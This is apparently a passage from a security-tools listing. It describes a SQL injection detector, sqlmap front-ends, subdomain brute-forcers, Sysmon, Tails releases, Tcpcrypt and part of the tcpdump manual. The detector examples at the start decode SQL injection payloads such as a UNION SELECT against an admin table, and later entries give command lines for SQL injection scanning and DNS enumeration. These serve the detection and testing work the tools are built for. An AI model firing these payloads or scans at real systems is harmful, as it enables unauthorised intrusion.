    >>> detector.classify({'urlpath': '/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==' }, True)
    >>> 
    {
        'payloads': [{
            'key': '',
            'score': 4.070000171661377,
            'source': 'urlpath: querystring_decode b64decode url_decode ',
            'value': '-1 and 1=2 union select 1,2,3,chr(106),5,6,7,8,9,10,11,12 from admin'
        }],
        'result': 1
    }
    
    >>> detector.classify({'body': 'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
    >>>
    {
        'payloads': [{
            'key': '',
            'score': 3.9800000190734863,
            'source': 'body: querystring_decode ',
            'value': "SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)-- '"
        }, {
            'key': '',
            'score': 2.0899999141693115,
            'source': 'body: querystring_decode ',
            'value': "'SQL inject' and Password"
        }, {
            'key': '',
            'score': 2.180000066757202,
            'source': 'body: querystring_decode ',
            'value': "(SELECT @@VERSION)-- '"
        }, {
            'key': '',
            'score': 0.0,
            'source': 'body: querystring_decode ',
            'value': 'saveedit'
        }],
        'result': 1
    }

    Customization

    The is_sqli API (in sqlchop.py) detects SQLi using score 2.1 as threshold, you can adjust this threshold according to your usage scenario.
        def is_sqli(self, payload):
            ret = self.score_sqli(payload)
            return ret > 2.1  # here you can modify and test this threshold
    
        def classify(self, request, detail=False):
            ...


    Download SQLChop

    SQLiPy - Plugin for Burp Suite that integrates SQLMap using the SQLMap API


    SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.

    SQLMap comes with a RESTful based server that will execute SQLMap scans. This plugin can start the API for you or connect to an already running API to perform a scan.

    Requirements

    Jython 2.7 beta, due to the use of json
    Java 1.7 or 1.8 (the beta version of Jython 2.7 requires this)

    Usage

    SQLiPy relies on a running instance of the SQLMap API server. You can manually start the server with:
      python sqlmapapi.py -s -H <ip> -p <port>
    Or, you can use the SQLMap API tab to select the IP/Port on which to run, as well as the path to python and sqlmapapi.py on your system.

    Once the SQLMap API is running, it is just a matter of right mouse clicking in the 'Request' sub tab of either the Target or Proxy main tabs and choosing 'SQLiPy Scan'.

    This will populate the SQLMap Scanner tab of the plugin with information about that request. Clicking the 'Start Scan' button will execute a scan.

    If the page is vulnerable to SQL injection, then a thread from the plugin will poll the results and add them to the Scanner Results tab.

    Read more here.


    Download SQLiPy

    SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP


    PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!

    Here is a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.

    Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005


    Demo against: Linux (CentOS), Apache, MySQL, PHP


    Requirements:
    • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
      • PHP 5.3+ is suggested, older versions not tests so mileage may vary
    • Python and any SQLMAP dependencies (refer to their wiki for any help there)
    • Clone this repo to your machine
      • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
      • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
      • When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
      • Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)

    Download SQLMAP-Web-GUI

    Squert - A Simple QUEry and Report Tool


    Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.

    Intro Video:
     

    Requirements

    Download  Squert

    SubBrute - Subdomain Bruteforcer

    SubBrute is a community driven project with the goal of creating the fastest, and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting (https://www.us-cert.gov/ncas/alerts/TA13-088A). This design also provides a layer of anonymity, as SubBrute does not send traffic directly to the target's name servers.

    Whats new in v1.1?

    This version merges pull requests from the community; changes from JordanMilne, KxCode and rc0r is in this release. In SubBrute 1.1 we fixed bugs, improved accuracy, and efficiency. As requested, this project is now GPLv3.

    Accuracy and better wildcard detection:
    • A new filter that can pickup Geolocation aware wildcards.
    • Filter misbehaving nameservers
    Faster:
    • More than 2,000 high quality nameservers were added to resolvers.txt, these servers will resolve multiple queries in under 1 sec.
    • Nameservers are verified when they are needed. A seperate thread is responsible creating a feed of nameservers, and corresponding wildcard blacklist.
    New output:
    • -a will list all addresses associated with a subdomain.
    • -v debug output, to help developers/hackers debug subbrute.
    • -o output results to file.

    More Information

    The 'names.txt' list was created using some creative Google hacks with additions from the community. SubBrute has a feature to build your own subdomain lists by matching sub-domains with regular expression and sorting by frequency of occurrence:
    • python subroute.py -f full.html > my_subs.txt
    names.txt contains 31298 subdomains. subs_small.txt was stolen from fierce2 which contains 1896 subdomains. If you find more subdomains to add, open a bug report or pull request and I'll be happy to add them.
    No install required for Windows, just cd into the 'windows' folder:
    • subbrute.exe google.com
    Easy to install: You just need http://www.dnspython.org/ and python2.7 or python3. This tool should work under any operating system: bsd, osx, windows, linux...

    (On a side note giving a makefile root always bothers me, it would be a great way to install a backdoor...)
    Under Ubuntu/Debian all you need is:
    • sudo apt-get install python-dnspython
    On other operating systems you may have to install dnspython manually:
    http://www.dnspython.org/

    Easy to use:
    • ./subbrute.py google.com
    Tests multiple domains:
    • ./subbrute.py google.com gmail.com blogger.com
    or a newline delimited list of domains:
    • ./subbrute.py -t list.txt
    Also keep in mind that subdomains can have subdomains (example: _xmpp-server._tcp.gmail.com):
    • ./subbrute.py gmail.com > gmail.out
    • ./subbrute.py -t gmail.out


    Download SubBrute

    SubDomain Analyzer - Get detailed information of a domain


    The "SubDomain Analyzer" tool written in Python language. The purpose of "SubDomain Analyzer" getting full detailed information of selected domain. The "SubDomain Analyzer" gets data from domain by following steps:
    1. Trying to get the zone tranfer file.
    2. Gathers all information from DNS records.
    3. Analyzing the DNS records (Analyzing all IP's addresses from DNS records and test class C range from IP address (For example: 127.0.0.1/24) and getting all data that containing the domain being analyzed).
    4. Tests subdomains by dictionary attack.

    The Subdomain Analyzer can keep new addresses which found on DNS records or IP's analyzer. The Subdomain Analyzer can brings a very qualitative information about the domain being analyzed, additionally, he shows a designed report with all the data.

    Examples:
    • Analyzing example.com domain: subdomain-analyzer.py example.com
    • Analyzing example.com domain, save the records on log file by name log.txt, works with 100 threads and use by another dictionary file by name another-file.txt: subdomain-analyzer.py example.com --output log.txt --threads 100 --sub-domain-list another-file.txt
    • Analyzing example.com domain, save the records on log file by name log.txt and append a new sub-domains to sub-domains list file: subdomain-analyzer.py example.com -o log.txt --sub-domain-list

    Requirements:

    Linux Installation:
    1. sudo apt-get install python-dev python-pip
    2. sudo pip install -r requirements.txt
    3. easy_install prettytable

    MacOSx Installation:
    1. Install Xcode Command Line Tools (AppStore)
    2. sudo easy_install pip, prettytable
    3. sudo pip install -r requirements.txt

    Windows Installation:
    1. Install dnspython
    2. Install gevent
    3. Install prettytable
    4. Open Command Prompt(cmd) as Administrator -> Goto python folder -> Scripts (cd c:\Python27\Scripts)
    5. pip install -r (Full Path To requirements.txt)
    6. easy_install prettytable

    Download SubDomain Analyzer

    SUMo - Software Update Monitor


    SUMo (Software Update Monitor) keeps your PC up-to-date & safe by using the most recent version of your favorite software !

    Unlike built-in auto update features, SUMo tells you if updates are available before you need to use your software.

    Features
    • Automatic detection of installed software
    • Detects required updates / patchs for your software
    • Detects required drivers update (requires DUMo)
    • Filter / authorize Beta versions (user setting)
    • Ignore list : only tracks software YOU want to track
    • More compatibility and less false positive than others Update Monitors (according to users feedback ;-)
    • Internationalization support.

    Download SUMo

    Sysmon v2.0 - System Activity Monitor for Windows


    System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.

    Note that Sysmon does not provide analysis of the events it generates, nor does it attempt to protect or hide itself from attackers.

    Overview of Sysmon Capabilities

    Sysmon includes the following capabilities:
    • Logs process creation with full command line for both current and parent processes.
    • Records the hash of process image files using SHA1 (the default), MD5, SHA256 or IMPHASH.
    • Multiple hashes can be used at the same time.
    • Includes a process GUID in process create events to allow for correlation of events even when Windows reuses process IDs.
    • Include a session GUID in each events to allow correlation of events on same logon session.
    • Logs loading of drivers or DLLs with their signatures and hashes.
    • Optionally logs network connections, including each connection’s source process, IP addresses, port numbers, hostnames and port names.
    • Detects changes in file creation time to understand when a file was really created. Modification of file create timestamps is a technique commonly used by malware to cover its tracks.
    • Automatically reload configuration if changed in the registry.
    • Rule filtering to include or exclude certain events dynamically.
    • Generates events from early in the boot process to capture activity made by even sophisticated kernel-mode malware.

    Usage

    Uses Sysmon simple command-line options to install and uninstall it, as well as to check and modify Sysmon’s configuration:

    Sysinternals Sysmon v2.00 - System activity monitor

    Copyright (C) 2014-2015 Mark Russinovich and Thomas Garnier
    Sysinternals - www.sysinternals.com


    Usage:
    Install:    Sysmon.exe -i <configfile>
    [-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]
    [-l (<process,...>)]
    Configure:  Sysmon.exe -c <configfile>

                  [--|[-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]

                       [-l (<process,...>)]]
    Uninstall:  Sysmon.exe -u
    -cUpdate configuration of an installed Sysmon driver or dump the current configuration if no other argument is provided. Optionally take a configuration file.
    -hSpecify the hash algorithms used for image identification (default is SHA1). It supports multiple algorithms at the same time. Configuration entry: Hashing.
    -iInstall service and driver. Optionally take a configuration file.
    -lLog loading of modules. Optionally take a list of processes to track. Configuration entry: ImageLoading.
    -mInstall the event manifest (done on service install as well).
    -nLog network connections. Optionally take a list of processes to track. Configuration entry: Network.
    -uUninstall service and driver.

    The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.

    On Vista and higher, events are stored in "Applications and Services Logs/Microsoft/Windows/Sysmon/Operational". On older systems, events written to the System event log.

    If you need more information on configuration files, use the '-? config' command. More examples are available on the Sysinternals website.

    Specify -accepteula to automatically accept the EULA on installation, otherwise you will be interactively prompted to accept it.

    Neither install nor uninstall requires a reboot.

    Examples

    Install with default settings (process images hashed with sha1 and no network monitoring)
    sysmon -accepteula  –i
    Install with md5 and sha256 hashing of process created and monitoring network connections
    sysmon -accepteula –i –h md5,sha256 –n
    Install Sysmon with a configuration file (as described below)
    sysmon –accepteula –i c:\windows\config.xml
    Uninstall
    sysmon –u
    Dump the current configuration
    sysmon –c
    Change the configuration to use all hashes, no network monitoring and monitoring of DLLs in Lsass
    sysmon –c –h * –l lsass.exe
    Change the configuration of sysmon with a configuration file (as described below)
    sysmon –c c:\windows\config.xml
    Change the configuration to default settings
    sysmon –c --


    Download Sysmon v2.0

    Tails 1.3 - The Amnesic Incognito Live System


    Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
    • use the Internet anonymously and circumvent censorship;
      all connections to the Internet are forced to go through the Tor network;
    • leave no trace on the computer you are using unless you ask it explicitly;
    • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.   

    Tails, The Amnesic Incognito Live System, version 1.3, is out.
    This release fixes numerous security issues and all users must upgrade as soon as possible.

    New features
    • Electrum is an easy to use bitcoin wallet. You can use the Bitcoin Client persistence feature to store your Electrum configuration and wallet.
    • The Tor Browser has additional operating system and data security. This security restricts reads and writes to a limited number of folders. Learn how to manipulate files with the new Tor Browser.
    • The obfs4 pluggable transport is now available to connect to Tor bridges. Pluggable transports transform the Tor traffic between the client and the bridge to help disguise Tor traffic from censors.
    • Keyringer lets you manage and share secrets using OpenPGP and Git from the command line.

    Upgrades and changes
    • The Mac and Linux manual installation processes no longer require the isohybrid command. Removing the isohybrid command simplifies the installation.
    • The tap-to-click and two-finger scrolling trackpad settings are now enabled by default. This should be more intuitive for Mac users.
    • The Ibus Vietnamese input method is now supported.
    • Improved support for OpenPGP smartcards through the installation of GnuPG 2.

    There are numerous other changes that may not be apparent in the daily operation of a typical user. Technical details of all the changes are listed in the Changelog.


    Download Tails 1.3

    Tails 1.4 - The Amnesic Incognito Live System



    Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
    • use the Internet anonymously and circumvent censorship;
      all connections to the Internet are forced to go through the Tor network;
    • leave no trace on the computer you are using unless you ask it explicitly;
    • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.  

    Tails, The Amnesic Incognito Live System, version 1.4, is out.

    New features
    • Tor Browser 4.5 now has a security slider that you can use to disable browser features, such as JavaScript, as a trade-off between security and usability. The security slider is set to low by default to provide the same level of security as previous versions and the most usable experience.
      We disabled in Tails the new circuit view of Tor Browser 4.5 for security reasons. You can still use the network map of Vidalia to inspect your circuits.
    • Tails OpenPGP Applet now has a shortcut to the gedit text editor, thanks to Ivan Bliminse.
    • Paperkey lets you print a backup of your OpenPGP secret keys on paper.

    Upgrades and changes
    • Tor Browser 4.5 protects better against third-party tracking. Often when visiting a website, many connections are created to transfer both the content of the main website (its page, images, and so on) and third-party content from other websites (advertisements, Like buttons, and so on). In Tor Browser 4.5, all such content, from the main website as well as the third-party websites, goes through the same Tor circuits. And these circuits are not reused when visiting a different website. This prevents third-party websites from correlating your visits to different websites.
    • Tor Browser 4.5 now keeps using the same Tor circuit while you are visiting a website. This prevents the website from suddenly changing language, behavior, or logging you out.
    • Disconnect is the new default search engine. Disconnect provides Google search results to Tor users without captchas or bans.
    • Better support for Vietnamese in LibreOffice through the installation of fonts-linuxlibertine.
    • Disable security warnings when connecting to POP3 and IMAP ports that are mostly used for StartTLS nowadays.
    • Support for more printers through the installation of printer-driver-gutenprint.
    • Upgrade Tor to 0.2.6.7.
    • Upgrade I2P to 0.9.19 that has several fixes and improvements for floodfill performance.
    • Remove the obsolete #i2p-help IRC channel from Pidgin.
    • Remove the command line email client mutt and msmtp.
    There are numerous other changes that might not be apparent in the daily operation of a typical user. Technical details of all the changes are listed in the Changelog.

    Fixed problems
    • Make the browser theme of the Windows 8 camouflage compatible with the Unsafe Browser and the I2P Browser.
    • Remove the Tor Network Settings... from the Torbutton menu.
    • Better support for Chromebook C720-2800 through the upgrade of syslinux.
    • Fix the localization of Tails Upgrader.
    • Fix the OpenPGP key servers configured in Seahorse.
    • Prevent Tor Browser from crashing when Orca is enabled.

    Tails 1.7 - The Amnesic Incognito Live System


    Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
    • use the Internet anonymously and circumvent censorship;
      all connections to the Internet are forced to go through the Tor network;
    • leave no trace on the computer you are using unless you ask it explicitly;
    • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.  

    Tails, The Amnesic Incognito Live System, version 1.7, is out.
    This release fixes numerous security issues. All users must upgrade as soon as possible.

    New features

    • You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents.
    • We added Icedove, a rebranded version of the Mozilla Thunderbird email client.
      Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove.

    Upgrades and changes

    • Improve the wording of the first screen of Tails Installer.
    • Restart Tor automatically if connecting to the Tor network takes too long. (#9516)
    • Update several firmware packages which might improve hardware compatibility.
    • Update the Tails signing key which is now valid until 2017.
    • Update Tor Browser to 5.0.4.
    • Update Tor to 0.2.7.4.

    Fixed problems

    • Prevent wget from leaking the IP address when using the FTP protocol. (#10364)
    • Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333)
    • Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades.
    • Make the "I2P is ready" notification more reliable.

    Tcpcrypt - Encrypting the Internet


    Tcpcrypt is a protocol that attempts to encrypt (almost) all of your network traffic. Unlike other security mechanisms, Tcpcrypt works out of the box: it requires no configuration, no changes to applications, and your network connections will continue to work even if the remote end does not support Tcpcrypt, in which case connections will gracefully fall back to standard clear-text TCP. Install Tcpcrypt and you'll feel no difference in your every day user experience, but yet your traffic will be more secure and you'll have made life much harder for hackers.

    So why is now the right time to turn on encryption? Here are some reasons:
    • Intercepting communications today is simpler than ever because of wireless networks. Ask a hacker how many e-mail passwords can be intercepted at an airport by just using a wifi-enabled laptop. This unsophisticated attack is in reach of many. The times when only a few elite had the necessary skill to eavesdrop are gone.
    • Computers have now become fast enough to encrypt all Internet traffic. New computers come with special hardware crypto instructions that allow encrypted networking speeds of 10Gbit/s. How many of us even achieve those speeds on the Internet or would want to download (and watch) one movie per second? Clearly, we can encrypt fast enough.
    • Research advances and the lessons learnt from over 10 years of experience with the web finally enabled us to design a protocol that can be used in today's Internet, by today's users. Our protocol is pragmatic: it requires no changes to applications, it works with NATs (i.e., compatible with your DSL router), and will work even if the other end has not yet upgraded to tcpcrypt—in which case it will gracefully fall back to using the old plain-text TCP. No user configuration is required, making it accessible to lay users—no more obscure requests like "Please generate a 2048-bit RSA-3 key and a certificate request for signing by a CA". Tcpcrypt can be incrementally deployed today, and with time the whole Internet will become encrypted.

    How Tcpcrypt works

    Tcpcrypt is opportunistic encryption. If the other end speaks Tcpcrypt, then your traffic will be encrypted; otherwise it will be in clear text. Thus, Tcpcrypt alone provides no guarantees—it is best effort. If, however, a Tcpcrypt connection is successful and any attackers that exist are passive, then Tcpcrypt guarantees privacy.

    Network attackers come in two varieties: passive and active (man-in-the-middle). Passive attacks are much simpler to execute because they just require listening on the network. Active attacks are much harder as they require listening and modifying network traffic, often requiring very precise timing that can make some attacks impractical.

    By default Tcpcrypt is vulnerable to active attacks—an attacker can, for example, modify a server's response to say that Tcpcrypt is not supported (when in fact it is) so that all subsequent traffic will be clear text and can thus be eavesdropped on.

    Tcpcrypt, however, is powerful enough to stop active attacks, too, if the application using it performs authentication. For example, if you log in to online banking using a password and the connection is over Tcpcrypt, it is possible to use that shared secret between you and the bank (i.e., the password) to authenticate that you are actually speaking to the bank and not some active (man-in-the-middle) attacker. The attacker cannot spoof authentication as it lacks the password. Thus, by default, Tcpcrypt will try its best to protect your traffic. Applications requiring stricter guarantees can get them by authenticating a Tcpcrypt session.

    How Tcpcrypt is different

    Some of us already encrypt some network traffic using SSL (e.g., HTTPS) or VPNs. Those solutions are inadequate for ubiquitous encryption. For example, almost all solutions rely on a PKI to stop man-in-the-middle attacks, which for ubiquitous deployment would mean that all Internet users would have to get verified by a CA like Verisign and have to spend money to buy a certificate. Tcpcrypt abstracts away authentication, allowing any mechanism to be used, whether PKI, passwords, or something else.
    Next, Tcpcrypt can be incrementally deployed: it has a mechanism for probing support and can gracefully fall back to TCP. It also requires no configuration (try that with a VPN!) and has no NAT issues. Finally, Tcpcrypt has very high performance (up to 25x faster than SSL), making it feasible for high volume servers to enable encryption on all connections. While weaker by default, Tcpcrypt is more realistic for universal deployment.

    We can easily make the bar much higher for attackers, so let's do it. How much longer are we going to stay clear-text by default?


    Download Tcpcrypt

    Tcpdump - Dump Traffic on a Network


    Tcpdump allows you to dump the traffic on a network. It can be used to print out the headers and/or contents of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect many attacks, or to monitor the network activities.
    Tcpdump prints out a description of the contents of packets on a network interface that match the boolean expression; the description is preceded by a time stamp, printed, by default, as hours, minutes, seconds, and fractions of a second since midnight. It can also be run with the -w flag, which causes it to save the packet data to a file for later analysis, and/or with the -r flag, which causes it to read from a saved packet file rather than to read packets from a network interface. It can also be run with the -V flag, which causes it to read a list of saved packet files. In all cases, only packets that match expression will be processed by tcpdump.
    Tcpdump will, if not run with the -c flag, continue capturing packets until it is interrupted by a SIGINT signal (generated, for example, by typing your interrupt character, typically control-C) or a SIGTERM signal (typically generated with the kill(1) command); if run with the -c flag, it will capture packets until it is interrupted by a SIGINT or SIGTERM signal or the specified number of packets have been processed.
    When tcpdump finishes capturing packets, it will report counts of:
    packets ``captured'' (this is the number of packets that tcpdump has received and processed);
    packets ``received by filter'' (the meaning of this depends on the OS on which you're running tcpdump, and possibly on the way the OS was configured - if a filter was specified on the command line, on some OSes it counts packets regardless of whether they were matched by the filter expression and, even if they were matched by the filter expression, regardless of whether tcpdump has read and processed them yet, on other OSes it counts only packets that were matched by the filter expression regardless of whether tcpdump has read and processed them yet, and on other OSes it counts only packets that were matched by the filter expression and were processed by tcpdump);
    packets ``dropped by kernel'' (this is the number of packets that were dropped, due to a lack of buffer space, by the packet capture mechanism in the OS on which tcpdump is running, if the OS reports that information to applications; if not, it will be reported as 0).
    On platforms that support the SIGINFO signal, such as most BSDs (including Mac OS X) and Digital/Tru64 UNIX, it will report those counts when it receives a SIGINFO signal (generated, for example, by typing your ``status'' character, typically control-T, although on some platforms, such as Mac OS X, the ``status'' character is not set by default, so you must set it with stty(1) in order to use it) and will continue capturing packets. On platforms that do not support the SIGINFO signal, the same can be achieved by using the SIGUSR1 signal.
    Reading packets from a network interface may require that you have special privileges; see the pcap (3PCAP) man page for details. Reading a saved packet file doesn't require special privileges.  

    OPTIONS

    -A
    Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.
    -b
    Print the AS number in BGP packets in ASDOT notation rather than ASPLAIN notation.
    -B buffer_size
    --buffer-size=buffer_size
    Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes).
    -c count
    Exit after receiving count packets.
    -C file_size
    Before writing a raw packet to a savefile, check whether the file is currently larger than file_size and, if so, close the current savefile and open a new one. Savefiles after the first savefile will have the name specified with the -w flag, with a number after it, starting at 1 and continuing upward. The units of file_size are millions of bytes (1,000,000 bytes, not 1,048,576 bytes).
    -d
    Dump the compiled packet-matching code in a human readable form to standard output and stop.
    -dd
    Dump packet-matching code as a C program fragment.
    -ddd
    Dump packet-matching code as decimal numbers (preceded with a count).
    -D
    --list-interfaces
    Print the list of the network interfaces available on the system and on which tcpdump can capture packets. For each network interface, a number and an interface name, possibly followed by a text description of the interface, is printed. The interface name or the number can be supplied to the -i flag to specify an interface on which to capture.
    This can be useful on systems that don't have a command to list them (e.g., Windows systems, or UNIX systems lacking ifconfig -a); the number can be useful on Windows 2000 and later systems, where the interface name is a somewhat complex string.
    The -D flag will not be supported if tcpdump was built with an older version of libpcap that lacks the pcap_findalldevs() function.
    -e
    Print the link-level header on each dump line. This can be used, for example, to print MAC layer addresses for protocols such as Ethernet and IEEE 802.11.
    -E
    Use spi@ipaddr algo:secret for decrypting IPsec ESP packets that are addressed to addr and contain Security Parameter Index value spi. This combination may be repeated with comma or newline separation.
    Note that setting the secret for IPv4 ESP packets is supported at this time.
    Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc, cast128-cbc, or none. The default is des-cbc. The ability to decrypt packets is only present if tcpdump was compiled with cryptography enabled.
    secret is the ASCII text for ESP secret key. If preceded by 0x, then a hex value will be read.
    The option assumes RFC2406 ESP, not RFC1827 ESP. The option is only for debugging purposes, and the use of this option with a true `secret' key is discouraged. By presenting IPsec secret key onto command line you make it visible to others, via ps(1) and other occasions.
    In addition to the above syntax, the syntax file name may be used to have tcpdump read the provided file in. The file is opened upon receiving the first ESP packet, so any special permissions that tcpdump may have been given should already have been given up.
    -f
    Print `foreign' IPv4 addresses numerically rather than symbolically (this option is intended to get around serious brain damage in Sun's NIS server --- usually it hangs forever translating non-local internet numbers).
    The test for `foreign' IPv4 addresses is done using the IPv4 address and netmask of the interface on which capture is being done. If that address or netmask are not available, available, either because the interface on which capture is being done has no address or netmask or because the capture is being done on the Linux "any" interface, which can capture on more than one interface, this option will not work correctly.
    -F file
    Use file as input for the filter expression. An additional expression given on the command line is ignored.
    -G rotate_seconds
    If specified, rotates the dump file specified with the -w option every rotate_seconds seconds. Savefiles will have the name specified by -w which should include a time format as defined by strftime(3). If no time format is specified, each new file will overwrite the previous.
    If used in conjunction with the -C option, filenames will take the form of `file<count>'.
    -h
    --help
    Print the tcpdump and libpcap version strings, print a usage message, and exit.
    --version
    Print the tcpdump and libpcap version strings and exit.
    -H
    Attempt to detect 802.11s draft mesh headers.
    -i interface
    --interface=interface
    Listen on interface. If unspecified, tcpdump searches the system interface list for the lowest numbered, configured up interface (excluding loopback), which may turn out to be, for example, ``eth0''.
    On Linux systems with 2.2 or later kernels, an interface argument of ``any'' can be used to capture packets from all interfaces. Note that captures on the ``any'' device will not be done in promiscuous mode.
    If the -D flag is supported, an interface number as printed by that flag can be used as the interface argument.
    -I
    --monitor-mode
    Put the interface in "monitor mode"; this is supported only on IEEE 802.11 Wi-Fi interfaces, and supported only on some operating systems.
    Note that in monitor mode the adapter might disassociate from the network with which it's associated, so that you will not be able to use any wireless networks with that adapter. This could prevent accessing files on a network server, or resolving host names or network addresses, if you are capturing in monitor mode and are not connected to another network with another adapter.
    This flag will affect the output of the -L flag. If -I isn't specified, only those link-layer types available when not in monitor mode will be shown; if -I is specified, only those link-layer types available when in monitor mode will be shown.
    --immediate-mode
    Capture in "immediate mode". In this mode, packets are delivered to tcpdump as soon as they arrive, rather than being buffered for efficiency. This is the default when printing packets rather than saving packets to a ``savefile'' if the packets are being printed to a terminal rather than to a file or pipe.
    -j tstamp_type
    --time-stamp-type=tstamp_type
    Set the time stamp type for the capture to tstamp_type. The names to use for the time stamp types are given in pcap-tstamp(7); not all the types listed there will necessarily be valid for any given interface.
    -J
    --list-time-stamp-types
    List the supported time stamp types for the interface and exit. If the time stamp type cannot be set for the interface, no time stamp types are listed.
    --time-stamp-precision=tstamp_precision
    When capturing, set the time stamp precision for the capture to tstamp_precision. Note that availability of high precision time stamps (nanoseconds) and their actual accuracy is platform and hardware dependent. Also note that when writing captures made with nanosecond accuracy to a savefile, the time stamps are written with nanosecond resolution, and the file is written with a different magic number, to indicate that the time stamps are in seconds and nanoseconds; not all programs that read pcap savefiles will be able to read those captures.
    When reading a savefile, convert time stamps to the precision specified by timestamp_precision, and display them with that resolution. If the precision specified is less than the precision of time stamps in the file, the conversion will lose precision.
    The supported values for timestamp_precision are micro for microsecond resolution and nano for nanosecond resolution. The default is microsecond resolution.
    -K
    --dont-verify-checksums
    Don't attempt to verify IP, TCP, or UDP checksums. This is useful for interfaces that perform some or all of those checksum calculation in hardware; otherwise, all outgoing TCP checksums will be flagged as bad.
    -l
    Make stdout line buffered. Useful if you want to see the data while capturing it. E.g.,
    tcpdump -l | tee dat
    or
    tcpdump -l > dat & tail -f dat
    Note that on Windows,``line buffered'' means ``unbuffered'', so that WinDump will write each character individually if -l is specified.
    -U is similar to -l in its behavior, but it will cause output to be ``packet-buffered'', so that the output is written to stdout at the end of each packet rather than at the end of each line; this is buffered on all platforms, including Windows.
    -L
    --list-data-link-types
    List the known data link types for the interface, in the specified mode, and exit. The list of known data link types may be dependent on the specified mode; for example, on some platforms, a Wi-Fi interface might support one set of data link types when not in monitor mode (for example, it might support only fake Ethernet headers, or might support 802.11 headers but not support 802.11 headers with radio information) and another set of data link types when in monitor mode (for example, it might support 802.11 headers, or 802.11 headers with radio information, only in monitor mode).
    -m module
    Load SMI MIB module definitions from file module. This option can be used several times to load several MIB modules into tcpdump.
    -M secret
    Use secret as a shared secret for validating the digests found in TCP segments with the TCP-MD5 option (RFC 2385), if present.
    -n
    Don't convert addresses (i.e., host addresses, port numbers, etc.) to names.
    -N
    Don't print domain name qualification of host names. E.g., if you give this flag then tcpdump will print ``nic'' instead of ``nic.ddn.mil''.
    -#
    --number
    Print an optional packet number at the beginning of the line.
    -O
    --no-optimize
    Do not run the packet-matching code optimizer. This is useful only if you suspect a bug in the optimizer.
    -p
